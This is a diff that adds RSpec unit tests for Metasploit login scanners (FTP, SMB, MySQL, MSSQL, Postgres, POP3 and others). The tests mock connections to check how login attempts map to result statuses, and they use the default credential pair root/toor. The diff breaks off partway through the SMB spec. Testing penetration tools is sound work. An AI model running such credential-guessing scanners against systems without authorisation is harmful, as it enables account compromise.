diff --git a/spec/lib/metasploit/framework/login_scanner/afp_spec.rb b/spec/lib/metasploit/framework/login_scanner/afp_spec.rb
new file mode 100644
index 0000000000..2fc30ea51f
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/afp_spec.rb
@@ -0,0 +1,59 @@
+
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/afp'
+
+describe Metasploit::Framework::LoginScanner::AFP do
+
+  subject(:scanner) { described_class.new }
+
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base', has_realm_key: false, has_default_realm: false
+  it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+
+  it { should respond_to :login_timeout }
+
+  describe "#attempt_login" do
+    let(:pub_blank) do
+      Metasploit::Framework::Credential.new(
+        paired: true,
+        public: "public",
+        private: ''
+      )
+    end
+
+    it "Rex::ConnectionError should result in status Metasploit::Model::Login::Status::UNABLE_TO_CONNECT" do
+      expect(scanner).to receive(:connect).and_raise(Rex::ConnectionError)
+      result = scanner.attempt_login(pub_blank)
+
+      expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
+      expect(result.status).to eq(Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+    end
+
+    it "Timeout::Error should result in status Metasploit::Model::Login::Status::UNABLE_TO_CONNECT" do
+      expect(scanner).to receive(:connect).and_raise(Timeout::Error)
+      result = scanner.attempt_login(pub_blank)
+
+      expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
+      expect(result.status).to eq(Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+    end
+
+    it "EOFError should result in status Metasploit::Model::Login::Status::UNABLE_TO_CONNECT" do
+      expect(scanner).to receive(:connect).and_raise(EOFError)
+      result = scanner.attempt_login(pub_blank)
+
+      expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
+      expect(result.status).to eq(Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+    end
+
+    it "considers :skip_user to mean failure" do
+      expect(scanner).to receive(:connect)
+      expect(scanner).to receive(:login).and_return(:skip_user)
+      result = scanner.attempt_login(pub_blank)
+
+      expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
+      expect(result.status).to eq(Metasploit::Model::Login::Status::INCORRECT)
+    end
+
+  end
+
+end
+
diff --git a/spec/lib/metasploit/framework/login_scanner/axis2_spec.rb b/spec/lib/metasploit/framework/login_scanner/axis2_spec.rb
new file mode 100644
index 0000000000..e75465609e
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/axis2_spec.rb
@@ -0,0 +1,21 @@
+
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/axis2'
+
+describe Metasploit::Framework::LoginScanner::Axis2 do
+
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: true, has_default_realm: false
+  it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+  it_behaves_like 'Metasploit::Framework::LoginScanner::HTTP'
+
+  context "#method=" do
+    subject(:scanner) { described_class.new }
+
+    it "should raise, warning that the :method can't be changed" do
+      expect { scanner.method = "GET" }.to raise_error(RuntimeError)
+      expect(scanner.method).to eq("POST")
+    end
+  end
+
+end
+
diff --git a/spec/lib/metasploit/framework/login_scanner/db2_spec.rb b/spec/lib/metasploit/framework/login_scanner/db2_spec.rb
new file mode 100644
index 0000000000..531d788a2d
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/db2_spec.rb
@@ -0,0 +1,44 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/db2'
+
+describe Metasploit::Framework::LoginScanner::DB2 do
+  let(:public) { 'root' }
+  let(:private) { 'toor' }
+  let(:test_cred) {
+    Metasploit::Framework::Credential.new( public: public, private: private )
+  }
+  subject(:login_scanner) { described_class.new }
+
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: true, has_default_realm: true
+  it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+
+  context '#attempt_login' do
+
+    context 'when the socket errors' do
+      it 'returns a connection_error result for an Rex::ConnectionError' do
+        my_scanner = login_scanner
+        my_scanner.should_receive(:connect).and_raise ::Rex::ConnectionError
+        result = my_scanner.attempt_login(test_cred)
+        expect(result.status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        expect(result.proof).to eq ::Rex::ConnectionError.new.to_s
+      end
+
+      it 'returns a connection_error result for an Rex::ConnectionTimeout' do
+        my_scanner = login_scanner
+        my_scanner.should_receive(:connect).and_raise ::Rex::ConnectionTimeout
+        result = my_scanner.attempt_login(test_cred)
+        expect(result.status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        expect(result.proof).to eq ::Rex::ConnectionTimeout.new.to_s
+      end
+
+      it 'returns a connection_error result for an ::Timeout::Error' do
+        my_scanner = login_scanner
+        my_scanner.should_receive(:connect).and_raise ::Timeout::Error
+        result = my_scanner.attempt_login(test_cred)
+        expect(result.status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        expect(result.proof).to eq ::Timeout::Error.new.to_s
+      end
+    end
+  end
+
+end
\ No newline at end of file
diff --git a/spec/lib/metasploit/framework/login_scanner/ftp_spec.rb b/spec/lib/metasploit/framework/login_scanner/ftp_spec.rb
new file mode 100644
index 0000000000..326667e641
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/ftp_spec.rb
@@ -0,0 +1,134 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/ftp'
+
+describe Metasploit::Framework::LoginScanner::FTP do
+  let(:public) { 'root' }
+  let(:private) { 'toor' }
+
+  let(:pub_blank) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: ''
+    )
+  }
+
+  let(:pub_pub) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: public
+    )
+  }
+
+  let(:pub_pri) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: private
+    )
+  }
+
+  let(:invalid_detail) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: nil,
+        private: nil
+    )
+  }
+
+  let(:detail_group) {
+    [ pub_blank, pub_pub, pub_pri]
+  }
+
+  subject(:ftp_scanner) {
+    described_class.new
+  }
+
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: false, has_default_realm: false
+  it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+
+
+
+  context 'validations' do
+    context 'ftp_timeout' do
+
+      it 'defaults to 16' do
+        expect(ftp_scanner.ftp_timeout).to eq 16
+      end
+
+      it 'is not valid for a non-number' do
+        ftp_scanner.ftp_timeout = "a"
+        expect(ftp_scanner).to_not be_valid
+        expect(ftp_scanner.errors[:ftp_timeout]).to include "is not a number"
+      end
+
+      it 'is not valid for a floating point' do
+        ftp_scanner.ftp_timeout = 5.76
+        expect(ftp_scanner).to_not be_valid
+        expect(ftp_scanner.errors[:ftp_timeout]).to include "must be an integer"
+      end
+
+      it 'is not valid for a negative number' do
+        ftp_scanner.ftp_timeout = -8
+        expect(ftp_scanner).to_not be_valid
+        expect(ftp_scanner.errors[:ftp_timeout]).to include "must be greater than or equal to 1"
+      end
+
+      it 'is not valid for 0' do
+        ftp_scanner.ftp_timeout = 0
+        expect(ftp_scanner).to_not be_valid
+        expect(ftp_scanner.errors[:ftp_timeout]).to include "must be greater than or equal to 1"
+      end
+
+      it 'is valid for a legitimate  number' do
+        ftp_scanner.ftp_timeout = rand(1000) + 1
+        expect(ftp_scanner.errors[:ftp_timeout]).to be_empty
+      end
+    end
+
+
+  end
+
+  context '#attempt_login' do
+    before(:each) do
+      ftp_scanner.host = '127.0.0.1'
+      ftp_scanner.port = 21
+      ftp_scanner.connection_timeout = 30
+      ftp_scanner.ftp_timeout = 16
+      ftp_scanner.stop_on_success = true
+      ftp_scanner.cred_details = detail_group
+    end
+
+
+    context 'when it fails' do
+
+      it 'returns Metasploit::Model::Login::Status::UNABLE_TO_CONNECT for a Rex::ConnectionError' do
+        Rex::Socket::Tcp.should_receive(:create) { raise Rex::ConnectionError }
+        expect(ftp_scanner.attempt_login(pub_pri).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+      end
+
+      it 'returns Metasploit::Model::Login::Status::UNABLE_TO_CONNECT for a Rex::AddressInUse' do
+        Rex::Socket::Tcp.should_receive(:create) { raise Rex::AddressInUse }
+        expect(ftp_scanner.attempt_login(pub_pri).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+      end
+
+      it 'returns :connection_disconnect for a ::EOFError' do
+        Rex::Socket::Tcp.should_receive(:create) { raise ::EOFError }
+        expect(ftp_scanner.attempt_login(pub_pri).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+      end
+
+      it 'returns :connection_disconnect for a ::Timeout::Error' do
+        Rex::Socket::Tcp.should_receive(:create) { raise ::Timeout::Error }
+        expect(ftp_scanner.attempt_login(pub_pri).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+      end
+
+    end
+
+    context 'when it succeeds' do
+
+
+    end
+  end
+
+end
\ No newline at end of file
diff --git a/spec/lib/metasploit/framework/login_scanner/http_spec.rb b/spec/lib/metasploit/framework/login_scanner/http_spec.rb
new file mode 100644
index 0000000000..e0065623f6
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/http_spec.rb
@@ -0,0 +1,11 @@
+
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/http'
+
+describe Metasploit::Framework::LoginScanner::HTTP do
+
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: true, has_default_realm: false
+  it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+  it_behaves_like 'Metasploit::Framework::LoginScanner::HTTP'
+
+end
diff --git a/spec/lib/metasploit/framework/login_scanner/invalid_spec.rb b/spec/lib/metasploit/framework/login_scanner/invalid_spec.rb
new file mode 100644
index 0000000000..1db6b7f4cf
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/invalid_spec.rb
@@ -0,0 +1,38 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/invalid'
+
+describe Metasploit::Framework::LoginScanner::Invalid do
+
+  subject(:invalid) do
+    described_class.new(model)
+  end
+
+  let(:model) do
+    model_class.new
+  end
+
+  let(:model_class) do
+    Class.new do
+      include ActiveModel::Validations
+    end
+  end
+
+  it { should be_a StandardError }
+
+  it 'should use ActiveModel::Errors#full_messages' do
+    model.errors.should_receive(:full_messages).and_call_original
+
+    described_class.new(model)
+  end
+
+  context '#model' do
+    subject(:error_model) do
+      invalid.model
+    end
+
+    it 'should be the passed in model' do
+      error_model.should == model
+    end
+  end
+
+end
diff --git a/spec/lib/metasploit/framework/login_scanner/mssql_spec.rb b/spec/lib/metasploit/framework/login_scanner/mssql_spec.rb
new file mode 100644
index 0000000000..f419105c05
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/mssql_spec.rb
@@ -0,0 +1,93 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/mssql'
+
+describe Metasploit::Framework::LoginScanner::MSSQL do
+  let(:public) { 'root' }
+  let(:private) { 'toor' }
+
+  let(:pub_blank) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: ''
+    )
+  }
+
+  let(:pub_pub) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: public
+    )
+  }
+
+  let(:pub_pri) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: private
+    )
+  }
+
+
+  subject(:login_scanner) { described_class.new }
+
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: true, has_default_realm: true
+  it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+  it_behaves_like 'Metasploit::Framework::LoginScanner::NTLM'
+
+  it { should respond_to :windows_authentication }
+
+  context 'validations' do
+    context '#windows_authentication' do
+      it 'is not valid for the string true' do
+        login_scanner.windows_authentication = 'true'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:windows_authentication]).to include 'is not included in the list'
+      end
+
+      it 'is not valid for the string false' do
+        login_scanner.windows_authentication = 'false'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:windows_authentication]).to include 'is not included in the list'
+      end
+
+      it 'is  valid for true class' do
+        login_scanner.windows_authentication = true
+        expect(login_scanner.errors[:windows_authentication]).to be_empty
+      end
+
+      it 'is  valid for false class' do
+        login_scanner.windows_authentication = false
+        expect(login_scanner.errors[:windows_authentication]).to be_empty
+      end
+    end
+  end
+
+  context '#attempt_login' do
+    context 'when the is a connection error' do
+      it 'returns a result with the connection_error status' do
+        my_scanner = login_scanner
+        my_scanner.should_receive(:mssql_login).and_raise ::Rex::ConnectionError
+        expect(my_scanner.attempt_login(pub_blank).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+      end
+    end
+
+    context 'when the login fails' do
+      it 'returns a result object with a status of Metasploit::Model::Login::Status::INCORRECT' do
+        my_scanner = login_scanner
+        my_scanner.should_receive(:mssql_login).and_return false
+        expect(my_scanner.attempt_login(pub_blank).status).to eq Metasploit::Model::Login::Status::INCORRECT
+      end
+    end
+
+    context 'when the login succeeds' do
+      it 'returns a result object with a status of Metasploit::Model::Login::Status::SUCCESSFUL' do
+        my_scanner = login_scanner
+        my_scanner.should_receive(:mssql_login).and_return true
+        expect(my_scanner.attempt_login(pub_blank).status).to eq Metasploit::Model::Login::Status::SUCCESSFUL
+      end
+    end
+  end
+
+end
\ No newline at end of file
diff --git a/spec/lib/metasploit/framework/login_scanner/mysql_spec.rb b/spec/lib/metasploit/framework/login_scanner/mysql_spec.rb
new file mode 100644
index 0000000000..6bc5a3df61
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/mysql_spec.rb
@@ -0,0 +1,108 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/mysql'
+
+describe Metasploit::Framework::LoginScanner::MySQL do
+  let(:public) { 'root' }
+  let(:private) { 'toor' }
+  let(:pub_blank) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: ''
+    )
+  }
+
+  let(:pub_pub) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: public
+    )
+  }
+
+  let(:pub_pri) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: private
+    )
+  }
+
+  subject(:login_scanner) { described_class.new }
+
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: false, has_default_realm: false
+  it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+
+  context '#attempt_login' do
+
+    context 'when the attempt is successful' do
+      it 'returns a result object with a status of Metasploit::Model::Login::Status::SUCCESSFUL' do
+        ::RbMysql.should_receive(:connect).and_return "fake mysql handle"
+        expect(login_scanner.attempt_login(pub_pri).status).to eq Metasploit::Model::Login::Status::SUCCESSFUL
+      end
+    end
+
+    context 'when the attempt is unsuccessful' do
+      context 'due to connection refused' do
+        it 'returns a result with a status of Metasploit::Model::Login::Status::UNABLE_TO_CONNECT' do
+          ::RbMysql.should_receive(:connect).and_raise Errno::ECONNREFUSED
+          expect(login_scanner.attempt_login(pub_pub).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        end
+
+        it 'returns a result with the proof containing an appropriate error message' do
+          ::RbMysql.should_receive(:connect).and_raise Errno::ECONNREFUSED
+          expect(login_scanner.attempt_login(pub_pub).proof).to eq "Connection refused"
+        end
+      end
+
+      context 'due to connection timeout' do
+        it 'returns a result with a status of Metasploit::Model::Login::Status::UNABLE_TO_CONNECT' do
+          ::RbMysql.should_receive(:connect).and_raise RbMysql::ClientError
+          expect(login_scanner.attempt_login(pub_pub).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        end
+
+        it 'returns a result with the proof containing an appropriate error message' do
+          ::RbMysql.should_receive(:connect).and_raise RbMysql::ClientError
+          expect(login_scanner.attempt_login(pub_pub).proof).to eq "Connection timeout"
+        end
+      end
+
+      context 'due to operation timeout' do
+        it 'returns a result with a status of Metasploit::Model::Login::Status::UNABLE_TO_CONNECT' do
+          ::RbMysql.should_receive(:connect).and_raise Errno::ETIMEDOUT
+          expect(login_scanner.attempt_login(pub_pub).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        end
+
+        it 'returns a result with the proof containing an appropriate error message' do
+          ::RbMysql.should_receive(:connect).and_raise Errno::ETIMEDOUT
+          expect(login_scanner.attempt_login(pub_pub).proof).to eq "Operation Timed out"
+        end
+      end
+
+      context 'due to not being allowed to connect from this host' do
+        it 'returns a result with a status of Metasploit::Model::Login::Status::UNABLE_TO_CONNECT' do
+          ::RbMysql.should_receive(:connect).and_raise RbMysql::HostNotPrivileged, "Host not privileged"
+          expect(login_scanner.attempt_login(pub_pub).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        end
+
+        it 'returns a result with the proof containing an appropriate error message' do
+          ::RbMysql.should_receive(:connect).and_raise RbMysql::HostNotPrivileged, "Host not privileged"
+          expect(login_scanner.attempt_login(pub_pub).proof).to eq "Unable to login from this host due to policy"
+        end
+      end
+
+      context 'due to access denied' do
+        it 'returns a result with a status of Metasploit::Model::Login::Status::INCORRECT' do
+          ::RbMysql.should_receive(:connect).and_raise RbMysql::AccessDeniedError, "Access Denied"
+          expect(login_scanner.attempt_login(pub_pub).status).to eq Metasploit::Model::Login::Status::INCORRECT
+        end
+
+        it 'returns a result with the proof containing an appropriate error message' do
+          ::RbMysql.should_receive(:connect).and_raise RbMysql::AccessDeniedError, "Access Denied"
+          expect(login_scanner.attempt_login(pub_pub).proof).to eq "Access Denied"
+        end
+      end
+    end
+  end
+
+end
\ No newline at end of file
diff --git a/spec/lib/metasploit/framework/login_scanner/pop3_spec.rb b/spec/lib/metasploit/framework/login_scanner/pop3_spec.rb
new file mode 100644
index 0000000000..ccefb2b97e
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/pop3_spec.rb
@@ -0,0 +1,82 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/pop3'
+
+describe Metasploit::Framework::LoginScanner::POP3 do
+  subject(:scanner) { described_class.new }
+
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: false, has_default_realm: false
+  it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+
+  context "#attempt_login" do
+    
+    let(:pub_blank) do
+      Metasploit::Framework::Credential.new(
+        paired: true,
+        public: "public",
+        private: ''
+      )
+    end
+    context "Raised Exceptions" do
+      it "Rex::ConnectionError should result in status Metasploit::Model::Login::Status::UNABLE_TO_CONNECT" do
+        expect(scanner).to receive(:connect).and_raise(Rex::ConnectionError)
+        result = scanner.attempt_login(pub_blank)
+
+        expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
+        expect(result.status).to eq(Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+      end
+
+      it "Timeout::Error should result in status Metasploit::Model::Login::Status::UNABLE_TO_CONNECT" do
+        expect(scanner).to receive(:connect).and_raise(Timeout::Error)
+        result = scanner.attempt_login(pub_blank)
+
+        expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
+        expect(result.status).to eq(Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+      end
+
+      it "EOFError should result in status Metasploit::Model::Login::Status::UNABLE_TO_CONNECT" do
+        expect(scanner).to receive(:connect).and_raise(EOFError)
+        result = scanner.attempt_login(pub_blank)
+
+        expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
+        expect(result.status).to eq(Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+      end
+    end
+    
+    context "Open Connection" do
+      let(:sock) {double('socket')}
+      
+      before(:each) do
+        sock.stub(:shutdown)
+        sock.stub(:close)
+        sock.stub(:closed?)
+        expect(scanner).to receive(:connect)
+        scanner.stub(:sock).and_return(sock)
+        scanner.should_receive(:select).with([sock],nil,nil,0.4)
+      end
+      
+      it "Server returns +OK" do
+        expect(sock).to receive(:get_once).exactly(3).times.and_return("+OK")
+        expect(sock).to receive(:put).with("USER public\r\n").once.ordered
+        expect(sock).to receive(:put).with("PASS \r\n").once.ordered
+        
+        result = scanner.attempt_login(pub_blank)
+
+        expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
+        expect(result.status).to eq(Metasploit::Model::Login::Status::SUCCESSFUL)
+        
+      end
+      
+      it "Server Returns Something Else" do
+        sock.stub(:get_once).and_return("+ERROR")
+        
+        result = scanner.attempt_login(pub_blank)
+
+        expect(result).to be_kind_of(Metasploit::Framework::LoginScanner::Result)
+        expect(result.status).to eq(Metasploit::Model::Login::Status::INCORRECT)
+        expect(result.proof).to eq("+ERROR")
+        
+      end
+    end
+    
+  end
+end
diff --git a/spec/lib/metasploit/framework/login_scanner/postgres_spec.rb b/spec/lib/metasploit/framework/login_scanner/postgres_spec.rb
new file mode 100644
index 0000000000..029f07c642
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/postgres_spec.rb
@@ -0,0 +1,75 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/postgres'
+
+describe Metasploit::Framework::LoginScanner::Postgres do
+  let(:public) { 'root' }
+  let(:private) { 'toor' }
+  let(:realm) { 'template1' }
+
+  let(:full_cred) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: private,
+        realm: realm
+    )
+  }
+
+  let(:cred_no_realm) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: private
+    )
+  }
+
+  subject(:login_scanner) { described_class.new }
+
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: true, has_default_realm: true
+
+  context '#attempt_login' do
+    context 'when the login is successful' do
+      it 'returns a result object with a status of success' do
+        fake_conn = "fake_connection"
+        Msf::Db::PostgresPR::Connection.should_receive(:new).and_return fake_conn
+        fake_conn.should_receive(:close)
+        expect(login_scanner.attempt_login(full_cred).status).to eq Metasploit::Model::Login::Status::SUCCESSFUL
+      end
+    end
+
+    context 'when there is no realm on the credential' do
+      it 'uses template1 as the default realm' do
+        Msf::Db::PostgresPR::Connection.should_receive(:new).with('template1', 'root', 'toor', 'tcp://:')
+        login_scanner.attempt_login(cred_no_realm)
+      end
+    end
+
+    context 'when the realm is invalid but the rest of the credential is not' do
+      it 'includes the details in the result proof' do
+        Msf::Db::PostgresPR::Connection.should_receive(:new).and_raise RuntimeError, "blah\tC3D000"
+        result = login_scanner.attempt_login(cred_no_realm)
+        expect(result.status).to eq Metasploit::Model::Login::Status::INCORRECT
+        expect(result.proof).to eq "C3D000, Creds were good but database was bad"
+      end
+    end
+
+    context 'when the username or password is invalid' do
+      it 'includes a message in proof, indicating why it failed' do
+        Msf::Db::PostgresPR::Connection.should_receive(:new).and_raise RuntimeError, "blah\tC28000"
+        result = login_scanner.attempt_login(cred_no_realm)
+        expect(result.status).to eq Metasploit::Model::Login::Status::INCORRECT
+        expect(result.proof).to eq "Invalid username or password"
+      end
+    end
+
+    context 'when any other type of error occurs' do
+      it 'returns a failure with the error message in the proof' do
+        Msf::Db::PostgresPR::Connection.should_receive(:new).and_raise RuntimeError, "unknown error"
+        result = login_scanner.attempt_login(cred_no_realm)
+        expect(result.status).to eq Metasploit::Model::Login::Status::INCORRECT
+        expect(result.proof).to eq "unknown error"
+      end
+    end
+  end
+
+end
\ No newline at end of file
diff --git a/spec/lib/metasploit/framework/login_scanner/result_spec.rb b/spec/lib/metasploit/framework/login_scanner/result_spec.rb
new file mode 100644
index 0000000000..592f78daf4
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/result_spec.rb
@@ -0,0 +1,45 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner'
+
+describe Metasploit::Framework::LoginScanner::Result do
+
+  let(:private) { 'toor' }
+  let(:proof) { 'foobar' }
+  let(:public) { 'root' }
+  let(:realm) { nil }
+  let(:status) { Metasploit::Model::Login::Status::SUCCESSFUL }
+  let(:cred) {
+    Metasploit::Framework::Credential.new(public: public, private: private, realm: realm, paired: true)
+  }
+
+  subject(:login_result) {
+    described_class.new(
+        credential: cred,
+        proof: proof,
+        status: status
+    )
+  }
+
+  it { should respond_to :access_level }
+  it { should respond_to :credential }
+  it { should respond_to :proof }
+  it { should respond_to :status }
+  it { should respond_to :success? }
+
+  context '#success?' do
+    context 'when the status code is success' do
+        it 'returns true' do
+          expect(login_result.success?).to be_true
+        end
+    end
+
+    context 'when the status code is anything else' do
+      let(:status) { :connection_error }
+      it 'returns false' do
+        expect(login_result.success?).to be_false
+      end
+    end
+  end
+
+
+end
\ No newline at end of file
diff --git a/spec/lib/metasploit/framework/login_scanner/smb_spec.rb b/spec/lib/metasploit/framework/login_scanner/smb_spec.rb
new file mode 100644
index 0000000000..27ffff08ad
--- /dev/null
+++ b/spec/lib/metasploit/framework/login_scanner/smb_spec.rb
@@ -0,0 +1,157 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/smb'
+
+describe Metasploit::Framework::LoginScanner::SMB do
+  let(:public) { 'root' }
+  let(:private) { 'toor' }
+
+  let(:pub_blank) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: ''
+    )
+  }
+
+  let(:pub_pub) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: public
+    )
+  }
+
+  let(:pub_pri) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: private
+    )
+  }
+
+
+  subject(:login_scanner) { described_class.new }
+
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base',  has_realm_key: true, has_default_realm: true
+  it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+  it_behaves_like 'Metasploit::Framework::LoginScanner::NTLM'
+
+  it { should respond_to :smb_chunk_size }
+  it { should respond_to :smb_name }
+  it { should respond_to :smb_native_lm }
+  it { should respond_to :smb_native_os }
+  it { should respond_to :smb_obscure_trans_pipe_level }
+  it { should respond_to :smb_pad_data_level }
+  it { should respond_to :smb_pad_file_level }
+  it { should respond_to :smb_pipe_evasion }
+
+  context 'validations' do
+    context '#smb_verify_signature' do
+      it 'is not valid for the string true' do
+        login_scanner.smb_verify_signature = 'true'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:smb_verify_signature]).to include 'is not included in the list'
+      end
+
+      it 'is not valid for the string false' do
+        login_scanner.smb_verify_signature = 'false'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:smb_verify_signature]).to include 'is not included in the list'
+      end
+
+      it 'is  valid for true class' do
+        login_scanner.smb_verify_signature = true
+        expect(login_scanner.errors[:smb_verify_signature]).to be_empty
+      end
+
+      it 'is  valid for false class' do
+        login_scanner.smb_verify_signature = false
+        expect(login_scanner.errors[:smb_verify_signature]).to be_empty
+      end
+    end
+  end
+
+  context '#attempt_login' do
+    before(:each) do
+      login_scanner.stub_chain(:simple, :client, :auth_user, :nil?).and_return false
+    end
+    context 'when there is a connection error' do
+      it 'returns a result with the connection_error status' do
+        login_scanner.stub_chain(:simple, :login).and_raise ::Rex::ConnectionError
+        expect(login_scanner.attempt_login(pub_blank).status).to eq Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+      end
+    end
+
+    context 'when the credentials are correct, but we cannot login' do
+      [
+        0xC000006E, # => "STATUS_ACCOUNT_RESTRICTION",
+        0xC000006F, # => "STATUS_INVALID_LOGON_HOURS",
+        0xC0000070, # => "STATUS_INVALID_WORKSTATION",
+        0xC0000071, # => "STATUS_PASSWORD_EXPIRED",
+        0xC0000072, # => "STATUS_ACCOUNT_DISABLED",
+        0xC000015B, # => "STATUS_LOGON_TYPE_NOT_GRANTED",
+        0xC0000193, # => "STATUS_ACCOUNT_EXPIRED",
+        0xC0000224, # => "STATUS_PASSWORD_MUST_CHANGE",
+      ].each do |code|
+        it "returns a DENIED_ACCESS status" do
+          exception = Rex::Proto::SMB::Exceptions::LoginError.new
+          exception.error_code = code
+
+          login_scanner.stub_chain(:simple, :login).and_raise exception
+          login_scanner.stub_chain(:simple, :connect)
+          login_scanner.stub_chain(:simple, :disconnect)
+          login_scanner.stub_chain(:simple, :client, :auth_user, :nil?).and_return false
+
+          expect(login_scanner.attempt_login(pub_blank).status).to eq Metasploit::Model::Login::Status::DENIED_ACCESS
+        end
+      end
+
+    end
+
+    context 'when the login fails' do
+      it 'returns a result object with a status of Metasploit::Model::Login::Status::INCORRECT' do
+        login_scanner.stub_chain(:simple, :login).and_return false
+        login_scanner.stub_chain(:simple, :connect).and_raise Rex::Proto::SMB::Exceptions::Error
+        expect(login_scanner.attempt_login(pub_blank).status).to eq Metasploit::Model::Login::Status::INCORRECT
+      end
+    end
+
+    context 'when the login succeeds' do
+      context 'and the user is local admin' do
+        before(:each) do
+          login_scanner.simple = double
+          login_scanner.simple.stub(:connect).with(/.*admin\$/i)
+          login_scanner.simple.stub(:connect).with(/.*ipc\$/i)
+          login_scanner.simple.stub(:disconnect)
+        end
+
+        it 'returns a result object with a status of Metasploit::Model::Login::Status::SUCCESSFUL' do
+          login_scanner.stub_chain(:simple, :login).and_return true
+          result = login_scanner.attempt_login(pub_blank)
+          expect(result.status).to eq Metasploit::Model::Login::Status::SUCCESSFUL
+          expect(result.access_level).to eq described_class::AccessLevels::ADMINISTRATOR
+        end
+      end
+
+      context 'and the user is NOT local admin' do
+        before(:each) do
+          login_scanner.simple = double
+          login_scanner.simple.stub(:connect).with(/.*admin\$/i).and_raise(
+            # STATUS_ACCESS_DENIED
+            Rex::Proto::SMB::Exceptions::ErrorCode.new.tap{|e|e.error_code = 0xC0000022}
+          )
